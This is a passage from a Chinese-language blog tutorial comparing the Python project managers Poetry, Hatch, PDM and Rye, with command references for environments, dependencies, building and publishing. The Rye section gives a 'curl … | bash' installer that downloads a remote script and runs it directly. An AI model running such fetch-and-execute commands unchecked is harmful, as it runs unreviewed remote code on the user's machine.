class="string">&quot;^2.13.0&quot;</span>, source = <span class="string">&quot;private&quot;</span> &#125;  <span class="comment">// 指定依赖存储库</span></span><br><span class="line"></span><br><span class="line">[tool.poetry.dependencies]</span><br><span class="line">python = <span class="string">&quot;^3.7&quot;</span>  <span class="comment">// 声明 python 版本</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="基本工作流（对于测试已存在项目）"><a href="#基本工作流（对于测试已存在项目）" class="headerlink" title="基本工作流（对于测试已存在项目）"></a>基本工作流（对于测试已存在项目）</h3><blockquote>
<p>例举一个已存在项目的基本测试，配置虚拟环境，到安装依赖的基本流程。</p>
</blockquote>
<ul>
<li><code>cd</code> 进入项目</li>
<li><code>poetry init -n</code>   初始化项目</li>
<li><code>poetry shell</code>    进入交互式 shell ，会自动建立虚拟隔离环境</li>
<li><code>poetry add $(cat requirements.txt)</code>  安装当前项目依赖</li>
<li><code>poetry run python  [yourpyname.py](http://yourpyname.py)</code>   运行项目测试</li>
</ul>
<hr>
<blockquote>
<p><strong>总结</strong></p>
</blockquote>
<p>细心看文章的朋友可能会发现这个工具的介绍比较长，是因为poetry 功能更多，可以实现完整的python 工作流程，无论是对于开发者，还是测试人员，都可以满足其需求。使用场景，需要完整编写一个项目进行测试发布。或是测试一个已经存在的项目。文章前提到过 poetry 可以理解为 pipenv 的超集。那为什么还需要pipenv 呢，因为如果仅仅是用于已存在项目的测试的话，pipenv 可以更加方便的进行测试。大概就是这样了。</p>
<blockquote>
</blockquote>
<hr>
<h1 id="Hatch"><a href="#Hatch" class="headerlink" title="Hatch"></a>Hatch</h1><aside>
🍂 现代、可扩展的 Python 项目管理。标准化的构建系统，默认具有可重现的构建，强大的环境管理，支持自定义脚本，可配置的 Python 分发管理，轻松发布到 PyPI 或其他索引，项目生成，版本管理，依赖管理，环境隔离管理，包发布管理等等

<p>项目地址：<a href="https://github.com/pypa/hatch">https://github.com/pypa/hatch</a></p>
</aside>

<h2 id="安装-3"><a href="#安装-3" class="headerlink" title="安装"></a>安装</h2><blockquote>
<p>hatch 的包已经上传 pypi 。可以随意使用 pip，pipx 等等工具安装，也可以选择使用系统的包管理器安装，例如：</p>
</blockquote>
<ul>
<li><code>pip install hatch</code>   使用 pip 安装</li>
<li><code>pipx install hatch</code>  使用 pipx 安装到隔离环境</li>
<li><code>brew install hatch</code>  使用 brew 安装到 mac</li>
<li><code>pacman -S python-hatch</code>  使用 pacman 安装到 arch</li>
<li>。。。😮</li>
</ul>
<blockquote>
<p>安装完成后命令行执行 <code>hatch --version</code>  验证是否安装成功</p>
</blockquote>
<hr>
<h2 id="使用-4"><a href="#使用-4" class="headerlink" title="使用"></a>使用</h2><h3 id="全局指令"><a href="#全局指令" class="headerlink" title="全局指令"></a>全局指令</h3><ul>
<li><code>--verbose</code>  显示详细信息</li>
<li><code>--quiet</code>  安静模式，不显示信息</li>
<li><code>-help</code>   显示帮助信息</li>
<li><code>--version</code>  显示版本信息</li>
<li><code>--config</code>  指定配置文件</li>
</ul>
<h3 id="新建项目"><a href="#新建项目" class="headerlink" title="新建项目"></a>新建项目</h3><ul>
<li><code>hatch new &quot;Hatch Demo&quot;</code>  指定名称新建项目</li>
<li>项目目录结构</li>
</ul>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">hatch-demo</span><br><span class="line">├── src</span><br><span class="line">│   └── hatch_demo</span><br><span class="line">│       ├── __about__.py</span><br><span class="line">│       └── __init__.py</span><br><span class="line">├── tests</span><br><span class="line">│   └── __init__.py</span><br><span class="line">├── LICENSE.txt</span><br><span class="line">├── README.md</span><br><span class="line">└── pyproject.toml</span><br></pre></td></tr></table></figure>

<h3 id="初始化现有项目"><a href="#初始化现有项目" class="headerlink" title="初始化现有项目"></a>初始化现有项目</h3><ul>
<li><code>hatch new --init</code></li>
</ul>
<h3 id="环境管理-1"><a href="#环境管理-1" class="headerlink" title="环境管理"></a>环境管理</h3><blockquote>
<p>环境旨在为测试项目等提供隔离工作区。<br>生成 shell 或在 shell 中运行命令将自动触发创建。<br>在hatch 环境中只需要只用 pip 来安装 依赖包</p>
</blockquote>
<ul>
<li><code>hatch shell</code>  进入hatch 交互式 shell ，会自动创建隔离环境</li>
<li><code>pip list</code>   显示环境中的包</li>
<li><code>hatch run python -c &quot;import sys;print(sys.executable)”</code>     在 hatch 隔离环境中 使用 run 运行程序</li>
<li><code>hatch env show</code>  显示隔离环境信息</li>
<li><code>hatch env remove 删除单个环境</code></li>
<li><code>hatch env prune 删除所有环境</code></li>
<li><code>hatch clean</code> 删除生成项目</li>
<li><code>hatch dep show requirements -all</code>    显示环境依赖信息</li>
<li><code>hatch env find</code>  查看虚拟环境路径</li>
<li><code>hatch status</code>  显示有关当前环境的信息。</li>
</ul>
<h3 id="项目文件-1"><a href="#项目文件-1" class="headerlink" title="项目文件"></a>项目文件</h3><aside>
🍂 `pyproject.toml`  该文件为项目配置文件，存储着关于此项目的所有配置信息

</aside>

<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">[project]</span><br><span class="line">name = <span class="string">&quot;your-app&quot;</span>  <span class="comment">//项目名称</span></span><br><span class="line">dynamic = [<span class="string">&quot;version&quot;</span>]  <span class="comment">// 版本</span></span><br><span class="line">description = <span class="string">&#x27;...&#x27;</span>  <span class="comment">// 描述信息</span></span><br><span class="line">readme = <span class="string">&quot;README.md&quot;</span> <span class="comment">// 自述文件</span></span><br><span class="line">requires-python = <span class="string">&quot;&gt;=3.8&quot;</span>  <span class="comment">// python 版本</span></span><br><span class="line">license = <span class="string">&quot;Apache-2.0 OR MIT&quot;</span><span class="comment">// 许可证</span></span><br><span class="line">keywords = [</span><br><span class="line">  <span class="string">&quot;...&quot;</span>,</span><br><span class="line">]  <span class="comment">// 关键字</span></span><br><span class="line">classifiers = [</span><br><span class="line">  <span class="string">&quot;...&quot;</span>,</span><br><span class="line">]  <span class="comment">// 分类信息</span></span><br><span class="line"></span><br><span class="line">[project.urls]</span><br><span class="line">Documentation = <span class="string">&quot;...&quot;</span></span><br><span class="line"><span class="string">&quot;Source code&quot;</span> = <span class="string">&quot;...&quot;</span> <span class="comment">// url信息</span></span><br><span class="line"></span><br><span class="line">dependencies = [</span><br><span class="line">  <span class="string">&quot;...&quot;</span>,</span><br><span class="line">] <span class="comment">// 依赖信息</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<blockquote>
<p>命令控制</p>
</blockquote>
<ul>
<li><code>hatch config set [OPTIONS] KEY [VALUE]</code>  设置配置文件</li>
<li><code>hatch config find</code>  查看配置文件位置</li>
<li><code>hatch config restore</code>  配置文件恢复默认</li>
<li><code>hatch config show -a</code>   显示所有配置信息</li>
<li><code>hatch config update</code>  更新配置文件</li>
</ul>
<h3 id="依赖管理-1"><a href="#依赖管理-1" class="headerlink" title="依赖管理"></a>依赖管理</h3><ul>
<li>添加依赖，编写<code>pyproject.toml</code> 文件，并将其添加到组中 <code>dependencies</code>，例如cowsay：</li>
<li>下次生成 shell 或运行命令时，将安装此依赖项。</li>
<li>例</li>
</ul>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">[project]</span><br><span class="line">...</span><br><span class="line">dependencies = [</span><br><span class="line">  <span class="string">&quot;cryptography&quot;</span>,</span><br><span class="line">  <span class="string">&quot;click&gt;=7, &lt;9, != 8.0.0&quot;</span>,</span><br><span class="line">  <span class="string">&quot;python-dateutil==2.8.*&quot;</span>,</span><br><span class="line">  <span class="string">&quot;numpy~=1.21.4&quot;</span>,</span><br><span class="line">]</span><br></pre></td></tr></table></figure>

<h3 id="构建发布包"><a href="#构建发布包" class="headerlink" title="构建发布包"></a>构建发布包</h3><blockquote>
<p>在配置文件中配置构建信息，</p>
</blockquote>
<ul>
<li><code>hatch build -t wheel</code>  指定格式构建</li>
<li><code>hatch publish</code>   发布包</li>
<li><code>-r</code> &#x2F; <code>--repo</code>  指定仓库发布</li>
<li><code>hatch build</code>  将构建 sdist 和 wheel 包</li>
<li><code>hatch build -t wheel</code> 指定包格式构建，例如 <code>-t sdist -t wheel</code></li>
<li><code>hatch publish</code>  发布包</li>
<li><code>hatch publish /path/to/artifacts foo-1.tar.gz</code>  指定包发布</li>
</ul>
<blockquote>
<p>常用参数</p>
</blockquote>
<ul>
<li><code>--target</code>, <code>-t</code>  指定构建格式，例如 <code>-t sdist -t wheel</code></li>
<li><code>--clean</code>, <code>-c</code>  构建前清除原有包文件</li>
<li><code>-r</code> &#x2F; <code>--repo</code>  选择存储库，默认pypi</li>
<li><code>-u</code>&#x2F; <code>--user</code>   ，<code>-a</code>&#x2F; <code>--auth</code>  设置认证</li>
<li><code>--client-key</code>  配置客户端密钥</li>
</ul>
<h3 id="版本控制"><a href="#版本控制" class="headerlink" title="版本控制"></a>版本控制</h3><aside>
🍂 关于 python 版本的控制

</aside>

<ul>
<li><code>hatch python install all</code>   在环境中安装所有兼容的python 版本</li>
<li><code>hatch python update all</code>  更新 所有python 版本</li>
<li><code>hatch python find</code>  查看python 二进制文件信息</li>
<li><code>hatch python remove all</code>  删除 python ，所有已安装</li>
<li><code>hatch python show</code>  显示可用python信息</li>
</ul>
<h3 id="Hatch-常用插件"><a href="#Hatch-常用插件" class="headerlink" title="Hatch 常用插件"></a>Hatch 常用插件</h3><ul>
<li><a href="https://github.com/repo-helper/hatch-requirements-txt">https://github.com/repo-helper/hatch-requirements-txt</a>   从 <code>requirements.txt</code> 文件中读取项目依赖项。hatch 可以直接使用虚拟环境中的 pip 安装依赖从<code>requirements.txt</code>。</li>
</ul>
<h2 id="基本工作流程"><a href="#基本工作流程" class="headerlink" title="基本工作流程"></a>基本工作流程</h2><ul>
<li><code>hatch new --init .</code>     创建或初始化项目</li>
<li><code>hatch shell</code>   进入交互式shell</li>
<li><code>pip install -r requirements.txt</code>   安装项目依赖</li>
<li><code>hatch run python [pyfile.py](http://pyfile.py)</code>   测试运行</li>
<li><code>hatch env remove</code>  删除环境</li>
</ul>
<blockquote>
<p><strong>总结</strong></p>
<p>“Hatch 的高级价值主张是，如果一个人采用了所有功能，那么许多其他工具就变得不必要，因为它支持人们可能需要的一切。此外，如果选择仅使用特定功能，那么与替代方案相比仍然有好处“。以上这段话来自hatch 官方，本篇文章介绍了多种关于 python 项目管理的工具，功能相似但却有不同之处，我们不需要思考什么是最好的工具，我们只需要在不同的场景，选择合适的工具。最合适的方案。</p>
<hr>
</blockquote>
<h1 id="Pdm"><a href="#Pdm" class="headerlink" title="Pdm"></a>Pdm</h1><aside>
🦋 PDM 旨在成为下一代 Python 软件包管理工具。它最初是为个人兴趣而诞生的。如果你觉得 `pipenv` 或者`poetry` 用着非常好，并不想引入一个新的包管理器，那么继续使用它们吧；但如果你发现有些东西这些工具不支持，那么你很可能可以在 `pdm` 中找到。

<p>项目地址：<a href="https://github.com/pdm-project/pdm">https://github.com/pdm-project/pdm</a></p>
</aside>

<h2 id="安装-4"><a href="#安装-4" class="headerlink" title="安装"></a>安装</h2><aside>
🦋 Pdm 官方推荐将其安装到管理环境中，推荐使用 pipx 安装 Pdm

</aside>

<ul>
<li><code>pipx install pdm</code>  将pdm安装到隔离环境，使用pipx</li>
<li><code>pdm self update</code>   更新 pdm</li>
</ul>
<blockquote>
<p>也可使用其他包管理器安装。</p>
</blockquote>
<h3 id="pdm-自身管理"><a href="#pdm-自身管理" class="headerlink" title="pdm 自身管理"></a>pdm 自身管理</h3><ul>
<li><code>pdm self  list</code>  列出关于 pdm 的所有包</li>
<li><code>pdm self add  packagename</code>  指定包安装给pdm</li>
<li><code>pdm self remove  packagename</code>  删除pdm环境中的包</li>
<li><code>pdm self remove update</code> 更新 pdm 本身</li>
</ul>
<h2 id="项目管理"><a href="#项目管理" class="headerlink" title="项目管理"></a>项目管理</h2><ul>
<li><code>pdm init</code>  初始化项目</li>
<li><code>pdm init -n</code>   跳过交互式初始化，使用默认配置</li>
<li><code>pdm lock</code>：执行 lock任务 ，从<code>pyproject.toml</code> 文件中锁定依赖</li>
<li><code>pdm sync</code>   从锁定文件同步（添加&#x2F;删除&#x2F;更新）</li>
<li><code>pdm install</code>：执行 sync任务，先于 lock如果需要</li>
<li><code>pdm add</code>：添加依赖包，重新锁定然后同步</li>
<li><code>pdm remove</code>：删除依赖要求，重新锁定然后同步</li>
<li><code>pdm update</code>：从最新版本重新锁定依赖项，然后同步</li>
<li><code>pdm use</code>    切换python</li>
<li><code>pdm run flask run -p 54321</code>   运行脚本程序等</li>
<li><code>pdm run --list</code>  显示脚本列表</li>
<li><code>pdm fix</code>    根据最新版本的PDM修复项目问题</li>
</ul>
<h2 id="环境管理-2"><a href="#环境管理-2" class="headerlink" title="环境管理"></a>环境管理</h2><aside>
🦋 virtualenv 是默认模式。

</aside>

<ul>
<li><code>pdm config venv.backend [virtualenv|venv|conda]</code>.  切换虚拟环境后端</li>
<li><code>pdm venv create 3.8</code>  创建虚拟环境，指定python版本</li>
<li><code>pdm venv create --with venv 3.9</code>  指定后端创建</li>
<li><code>pdm venv list</code>   列出使用该项目创建的所有 virtualenv</li>
<li><code>pdm venv remove for-test</code>  删除虚拟环境</li>
<li><code>pdm venv activate for-test</code>  激活虚拟环境</li>
<li><code>pdm venv purge</code>  清除 <code>选定/所有</code>  创建的 Virtualenv环境</li>
<li><code>pdm use --venv test</code>  使用给定的 python 版本或路径作为基本解释器</li>
<li><code>pdm run python -m ensurepip</code>  在项目中安装 pip</li>
<li><code>pdm venv create --with-pip 3.9</code>  创建环境是包含 pip</li>
</ul>
<h2 id="配置管理"><a href="#配置管理" class="headerlink" title="配置管理"></a>配置管理</h2><ul>
<li><code>pdm config</code>  显示当前配置信息</li>
<li><code>pdm config pypi.url</code>  指定配置显示</li>
<li><code>pdm config pypi.url &quot;https://test.pypi.org/simple&quot;</code>  传递参数修改配置</li>
<li><code>pdm config --local pypi.url &quot;https://test.pypi.org/simple&quot;</code>  修改当前项目配置</li>
<li><code>pdm config pypi.url &quot;https://test.pypi.org/simple&quot;</code>  修改软件仓库</li>
<li><code>pdm config pypi.extra.url &quot;https://extra.pypi.org/simple&quot;</code> 添加额外软件仓库</li>
<li><code>pdm cache clear</code>  清理缓存目录下的所有文件</li>
</ul>
<h2 id="依赖管理-2"><a href="#依赖管理-2" class="headerlink" title="依赖管理"></a>依赖管理</h2><blockquote>
<p>导入其他依赖文件</p>
</blockquote>
<ul>
<li><code>-f {pipfile,poetry,flit,setuppy,requirements}, --format {pipfile,poetry,flit,setuppy,requirements}</code></li>
<li><code>pdm import</code>  从其他格式导入项目元数据</li>
<li><code>pdm import --format requirements requirements.txt</code>   导入 requirements.txt 文件依赖列表</li>
<li><code>pdm search httpx</code>    搜索软件包</li>
<li><code>pdm show pyasn1-modules</code>    显示指定包信息</li>
<li><code>pdm add requests</code>  添加依赖</li>
<li><code>pdm add requests==2.25.1</code>  指定版本</li>
<li><code>pdm add &quot;flask&gt;=1.0&quot;</code>  指定版本需求</li>
<li><code>pdm add ./sub-package</code> 添加本地依赖，可以是目录和文件，需要以 <code>.</code> 开头</li>
<li><code>pdm add &quot;https://github.com/numpy/numpy/releases/download/v1.20.0/numpy-1.20.0.tar.gz&quot;</code>  指定 url 添加依赖</li>
<li><code>pdm add -dG test pytest</code>  通过指定组添加开发依赖</li>
<li><code>pdm add -e ./sub-package --dev</code>  指定 -e 参数添加可编辑依赖</li>
<li><code>pdm update</code>  更新依赖</li>
<li><code>pdm update --update-all</code>  更新所有依赖项和子依赖项</li>
<li><code>pdm update requests</code>  指定依赖包更新</li>
<li><code>pdm update -G security -G http</code> &#x2F; <code>pdm update -G &quot;security,http&quot;</code> 指定组更新依赖</li>
<li><code>pdm update -G security cryptography</code>  更新指定组中的指定包依赖</li>
<li><code>pdm update -d</code>  更新开发依赖包</li>
<li><code>pdm update -dG test pytest</code>  更新指定组开发依赖包</li>
<li><code>pdm remove requests</code>  删除依赖</li>
<li><code>pdm remove -G web h11</code>  指定组删除依赖</li>
<li><code>pdm remove -dG test pytest-cov</code>  删除开发依赖，指定组包</li>
<li><code>pdm sync</code> 从锁定文件安装包。 <code>--clean</code>  选项，清除不需要的包</li>
<li><code>pdm update</code> 将更新锁定文件，然后 <code>sync</code> .</li>
<li><code>pdm install</code> 将检查项目文件是否有更改，如果需要，更新锁定文件，然后 <code>sync</code> .</li>
<li><code>pdm lock</code>  生成依赖锁定文件</li>
<li><code>pdm lock</code>  <code>-L/--lockfile &lt;filepath&gt;</code>  指定依赖锁定文件</li>
<li><code>pdm install</code>  安装锁定在 lockfile 中的所有组依赖</li>
<li><code>pdm install -G extra1</code>  指定组安装</li>
<li><code>pdm list</code> 列出packages目录中安装的所有软件包</li>
<li><code>pdm list --tree</code>  树形列出</li>
<li><code>pdm export -o requirements.txt</code>   导出依赖包格式</li>
</ul>
<h2 id="构建发布"><a href="#构建发布" class="headerlink" title="构建发布"></a>构建发布</h2><aside>
🦋 使用 pdm 构建发布包到 pypi ，或私有存储库更加方便

</aside>

<ul>
<li><code>pdm publish</code>将自动构建一个 wheel 包和一个源代码包（sdist），并将它们上传到PyPI索引。</li>
<li><code>pdm publish --repository https://test.pypi.org/legacy/</code>  指定存储库，可以是url也可以是name</li>
<li><code>pdm publish --repository testpypi</code>  指定存储库名称</li>
<li><code>-r</code> ， <code>--repository</code> ：要将包发布到的存储库名称或 url [env var： <code>PDM_PUBLISH_REPO</code> ]</li>
<li><code>-u</code> ， <code>--username</code> ： 访问存储库的用户名 [env var： <code>PDM_PUBLISH_USERNAME</code> ]</li>
<li><code>-P</code> ， <code>--password</code> ： 访问存储库的密码 [env var： <code>PDM_PUBLISH_PASSWORD</code> ]</li>
<li></li>
</ul>
<blockquote>
<p>单独生成发布</p>
</blockquote>
<ul>
<li><code>pdm build</code>  构建包</li>
<li><code>pdm publish --no-build</code>  发布，因为上一步构建了所以加上 <code>--no-build</code>   选项</li>
</ul>
<blockquote>
<p>构建配置，主配置文件中添加内容</p>
</blockquote>
<ul>
<li>配置文件配置</li>
</ul>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">[repository.pypi]</span><br><span class="line">username = <span class="string">&quot;frostming&quot;</span></span><br><span class="line">password = <span class="string">&quot;&lt;secret&gt;&quot;</span></span><br><span class="line"></span><br><span class="line">[repository.company]</span><br><span class="line">url = <span class="string">&quot;https://pypi.company.org/legacy/&quot;</span></span><br><span class="line">username = <span class="string">&quot;frostming&quot;</span></span><br><span class="line">password = <span class="string">&quot;&lt;secret&gt;&quot;</span></span><br><span class="line">ca_certs = <span class="string">&quot;/path/to/custom-cacerts.pem&quot;</span></span><br><span class="line"></span><br><span class="line">或者设置环境变量</span><br><span class="line">export PDM_PUBLISH_REPO=...</span><br><span class="line">export PDM_PUBLISH_USERNAME=...</span><br><span class="line">export PDM_PUBLISH_PASSWORD=...</span><br><span class="line">export PDM_PUBLISH_CA_CERTS=...</span><br></pre></td></tr></table></figure>

<ul>
<li>命令配置</li>
<li><code>pdm config repository.pypi.username &quot;**token**&quot;</code></li>
<li><code>pdm config repository.pypi.password &quot;my-pypi-token&quot;</code></li>
<li><code>pdm config repository.company.url &quot;https://pypi.company.org/legacy/&quot;</code></li>
<li><code>pdm config repository.company.ca_certs &quot;/path/to/custom-cacerts.pem&quot;</code></li>
</ul>
<h2 id="全局选项-1"><a href="#全局选项-1" class="headerlink" title="全局选项"></a>全局选项</h2><ul>
<li><code>-h</code> 、 <code>--help</code> ：显示此帮助消息并退出。</li>
<li><code>-V</code> ， <code>--version</code> ： 显示版本</li>
<li><code>-c</code> ， <code>--config</code> ： 指定另一个配置文件路径 [env var： <code>PDM_CONFIG_FILE</code> ]</li>
<li><code>-v</code> 、 <code>--verbose</code> ：用于 <code>-v</code> 详细输出和 <code>-vv</code> 更详细</li>
<li><code>-q</code> ， <code>--quiet</code> ：安静模式，不输出信息</li>
</ul>
<hr>
<h2 id="插件"><a href="#插件" class="headerlink" title="插件"></a>插件</h2><ul>
<li><a href="https://github.com/pdm-project/awesome-pdm">https://github.com/pdm-project/awesome-pdm</a>  关于 pdm 的插件列表</li>
</ul>
<blockquote>
<p><strong>总结</strong></p>
</blockquote>
<p>功能强大，完善，适用于任何使用场景。与其他管理器相比，PDM 并没有被和一个特定的构建后端绑定，你可以选择任何你喜欢的构建后端。跨平台，使用简单，现代的，旨在成为下一代 Python 软件包管理工具，python项目管理器。</p>
<blockquote>
</blockquote>
<hr>
<h1 id="Rye"><a href="#Rye" class="headerlink" title="Rye"></a>Rye</h1><aside>
🍁 Python 的实验性包管理解决方案，它安装和管理 Python 安装，帮助处理 `pyproject.toml` 文件，安装和卸载依赖项，在后台创建和更新 virtualenv。它支持 monorepos 和全局工具安装。
Rye 是一项实验性尝试，旨在为 Python 构建一种受 Rust 启发 `rustup` 的 `cargo` 新型打包体验。它尚未准备好生产，但非常感谢反馈和建议。

<p>项目地址：<a href="https://github.com/mitsuhiko/rye">https://github.com/mitsuhiko/rye</a></p>
</aside>

<h2 id="管理-Rye"><a href="#管理-Rye" class="headerlink" title="管理 Rye"></a>管理 Rye</h2><aside>
🍁 介绍关于 Rye 的安装方式，针对各种系统

</aside>

<h3 id="统一安装"><a href="#统一安装" class="headerlink" title="统一安装"></a>统一安装</h3><ul>
<li><a href="https://github.com/mitsuhiko/rye/releases">https://github.com/mitsuhiko/rye/releases</a> 下载对应系统包进行安装。</li>
<li><code>cargo install --git https://github.com/mitsuhiko/rye rye</code>   编译安装，因为Rye 是使用 rust 写的，所以可以用 cargo (<code>rust 包管理器</code>) 进行安装。</li>
<li>以上两种方式是针对所有系统的安装方式，下面介绍单独的安装方式</li>
</ul>
<h3 id="针对系统安装"><a href="#针对系统安装" class="headerlink" title="针对系统安装"></a>针对系统安装</h3><ul>
<li><strong>Linux</strong> ：<code>curl -sSf https://rye-up.com/get | bash</code>  使用官方脚本进行安装。<br>也可以使用特定 Linux 发行版自己的包管理器进行安装，例如：<code>sudo pacman -S rye</code></li>
<li><strong>mac OS</strong>：<code>curl -sSf https://rye-up.com/get | bash</code> ，使用官方脚本进行安装，也可以使用包管理器进行安装，<code>brew install</code></li>
<li><strong>Windows</strong>： 使用上述介绍的统一安装方式安装。</li>
</ul>
<h3 id="更新-Rye"><a href="#更新-Rye" class="headerlink" title="更新 Rye"></a>更新 Rye</h3><ul>
<li><code>rye self update</code></li>
</ul>
<h3 id="卸载-Rye"><a href="#卸载-Rye" class="headerlink" title="卸载 Rye"></a>卸载 Rye</h3><ul>
<li><code>rye self uninstall</code></li>
</ul>
<h2 id="基本使用"><a href="#基本使用" class="headerlink" title="基本使用"></a>基本使用</h2><aside>
🍁 这里介绍基本使用流程

</aside>

<blockquote>
<p>项目管理</p>
</blockquote>
<ul>
<li><code>rye init my-project</code>  创建一个新项目</li>
<li><code>rye init</code>   或进入目录，初始化存在项目</li>
<li><code>rye init -r requirements.txt</code>     初始化项目，从<code>requirements.txt</code> 文件中导入依赖</li>
<li>目录结构</li>
</ul>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">.</span><br><span class="line">├── .git</span><br><span class="line">├── .gitignore</span><br><span class="line">├── .python-version</span><br><span class="line">├── README.md</span><br><span class="line">├── pyproject.toml</span><br><span class="line">└── src</span><br><span class="line">    └── my_project</span><br><span class="line">        └── __init__.py</span><br></pre></td></tr></table></figure>

<blockquote>
<p>初始化同步</p>
</blockquote>
<ul>
<li><code>rye pin 3.10</code>   可选指定版本，默认最新稳定版</li>
<li><code>rye sync</code>   同步项目，会在项目目录中建立virtualenv隔离文件夹，<code>.venv</code>   ，也会自动下载兼容的 python 解释器，生成<code>requirements.lock</code> <code>requirements-dev.lock</code>。以及根据项目文件安装依赖</li>
</ul>
<blockquote>
<p>激活环境</p>
</blockquote>
<ul>
<li><code>rye shell</code>  shell 生成一个激活 virtualenv 的 shell.。推荐方式</li>
<li><code>. .venv/bin/activate</code>  标准激活环境方式</li>
<li><code>deactivate</code>  退出环境</li>
<li><code>python -c &quot;import sys; print(sys.prefix)&quot;</code>  查看python 可执行文件路径，确定隔离环境是否激活</li>
<li><code>rye run black</code>  隔离环境运行程序</li>
</ul>
<blockquote>
<p>依赖管理</p>
</blockquote>
<ul>
<li><code>rye add &quot;flask&gt;=2.0&quot;</code>   指定依赖添加，并不会安装</li>
<li><code>rye sync</code>  重新同步安装依赖</li>
<li><code>rye remove flask</code>  删除依赖</li>
</ul>
<h2 id="环境管理-3"><a href="#环境管理-3" class="headerlink" title="环境管理"></a>环境管理</h2><blockquote>
<p>Rye 支持三种 python ，CPython，PyPy，自定义本地。</p>
</blockquote>
<ul>
<li><code>rye pin cpython@3.11.4</code>  指定使用 cpython 版本</li>
<li><code>rye pin pypy</code>   指定使用 pypy</li>
<li><code>rye toolchain list</code>  列出 python 工具链</li>
<li><code>rye toolchain list --include-downloadable</code>  查看可选安装的工具链列表</li>
<li><code>rye toolchain fetch pypy@3.10.12</code>     安装工具链，不指定安装会默认安装</li>
<li><code>rye toolchain register /path/to/python</code>  使用外部python 作为工具链</li>
<li><code>rye toolchain register --name=custom /path/to/python</code>  指定名称，路径</li>
<li><code>rye toolchain remove cpython@3.8.5</code>  删除工具链</li>
</ul>
<blockquote>
<p>全局工具安装</p>
</blockquote>
<ul>
<li><code>rye install ruff</code>  安装全局工具</li>
<li><code>rye install black --features colorama</code>  安装全局工具，传递额外依赖功能</li>
<li><code>rye tools list</code>  列出安装工具</li>
<li><code>rye tools list --include-scripts</code>  查看工具提供了什么脚本</li>
<li><code>rye uninstall black</code>  删除工具</li>
</ul>
<blockquote>
<p>信息查看</p>
</blockquote>
<ul>
<li><code>rye show</code>   显示当前环境信息</li>
<li><code>rye show --installed-deps</code>    显示环境安装依赖</li>
<li><code>rye --version</code>    显示rye 版本</li>
<li><code>rye help</code>  显示帮助信息</li>
<li><code>rye command -h</code>  显示命令帮助信息</li>
</ul>
<h2 id="依赖管理-3"><a href="#依赖管理-3" class="headerlink" title="依赖管理"></a>依赖管理</h2><blockquote>
<p><code>requirements.lock</code> 和 <code>requirements-dev.lock</code> 是rye项目的依赖锁定文件，<code>pyproject.toml</code>  文件为项目配置文件，除了存储当前项目配置信息，里面还有依赖配置信息</p>
</blockquote>
<ul>
<li><code>rye add Flask</code>  添加依赖</li>
<li><code>rye add &quot;Flask&gt;=2.0&quot;</code>  指定版本添加</li>
<li><code>rye add &quot;Flask[dotenv]&quot;</code> 添加额外依赖</li>
<li><code>rye add --dev black</code> 添加开发依赖</li>
<li><code>rye add Flask --git=https://github.com/pallets/flask</code> 添加git依赖</li>
<li><code>rye add My-Utility --path ./my-utility</code> 添加本地依赖</li>
<li><code>rye sync</code> 更新 lockfiles 以及 virtualenv</li>
<li><code>rye lock</code>  只更新锁定文件</li>
<li><code>rye lock --update-all</code>   更新所有依赖到最新合适版本，没有这个标志<br> 仅在必要时才会更新依赖项。</li>
<li><code>rye lock --all-features</code>  额外依赖</li>
<li><code>rye sync --no-lock</code>  不执行锁定步骤</li>
<li><code>rye sync --no-dev</code>  不同步开发</li>
</ul>
<h2 id="构建发布-1"><a href="#构建发布-1" class="headerlink" title="构建发布"></a>构建发布</h2><aside>
🍁 关于 python 包的构建与发布

</aside>

<ul>
<li><code>rye build</code>  默认情况下， <code>rye</code>将在中构建 sdist 和 Wheel 目标 <code>dist</code>目录。</li>
<li><code>rye build --wheel --out target</code>  使用 <code>--sdist</code>或者 <code>--wheel</code>标志来构建特定目标，或指定输出目录 <code>--out</code>.</li>
<li><code>rye build --clean</code>  构建之前清理构建目录</li>
<li><code>rye publish</code>  默认情况下，Rye 会将 <code>dist</code> 目录下的分发文件发布到 PyPI 中。</li>
<li><code>rye publish dist/example-0.1.0.tar.gz</code>  指定文件发布</li>
<li><code>rye publish --repository testpypi --repository-url https://test.pypi.org/legacy/</code>  指定存储库</li>
<li><code>rye publish --token &lt;your_token&gt; --yes</code>  指定 token ，自动确认</li>
</ul>
<blockquote>
<p><strong>总结</strong></p>
</blockquote>
<p>这是本文章介绍的最后一款关于 python 项目管理的工具，本身也是一款功能完整的工具，和文章上述提到的pdm ，poetry ，hatch等等相似，都具有项目管理，版本控制，依赖管理，环境隔离等功能，几款工具有一些细微的差别，但都是非常优秀的 python 项目管理工具。大家可根据自己的爱好，习惯以及使用场景来选择合适的工具</p>
<blockquote>
</blockquote>
<hr>
<p>🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦🐦</p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><aside>
🍁 文章的结构是按照文章中提到的工具功能完整性从简单到完整的流程来写的。
pip==pipx==pipenv==conda==poetry、hatch、pdm、rye。
参考这个简单的流程说明。
pip 是一款官方默认的python包管理器，可以处理依赖问题，功能比较单一，需要配合其他工具才能做好完整的项目管理。pipx是一款将python软件包直接安装到隔离环境使用的包管理器，功能仅此。conda 有完整的项目管理功能，但主要是为人工智能，机器学习，科学计算等等领域的用户提供更好，简单的环境，该功能后面的几款工具也都能实现。poetry、hatch、pdm、rye。这几款项目管理工具都具有完整的项目管理功能，可根据自己爱好，需求，场景，随意选择。
文章列举出了几乎所有的主流的关于 python 项目管理的工具方案。关于安装到使用都有较详细的说明。但并不完整，大家如果想除了基本使用等等更深入的了解该工具，可以去项目地址自行查看，文章都有一一列出。其次，文章难免会出现错误，见谅。

</aside>

<h1 id="参考地址"><a href="#参考地址" class="headerlink" title="参考地址"></a>参考地址</h1><ul>
